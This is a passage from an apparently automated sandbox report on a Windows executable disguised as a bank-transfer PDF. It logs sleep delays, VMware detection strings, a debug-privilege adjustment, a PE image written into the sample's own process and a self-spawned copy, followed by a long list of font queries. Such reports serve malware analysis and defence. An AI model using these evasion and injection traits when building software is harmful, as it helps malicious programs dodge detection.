                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeThread delayed: delay time: 42186Jump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeThread delayed: delay time: 60000Jump to behavior
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.291185342.000000000445F000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.295985554.0000000007AA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: HoR6YLHHGFsobhrR7rF
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeMemory written: C:\Users\user\Desktop\transferencia bancaria.pdf.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess created: C:\Users\user\Desktop\transferencia bancaria.pdf.exe C:\Users\user\Desktop\transferencia bancaria.pdf.exeJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Users\user\Desktop\transferencia bancaria.pdf.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
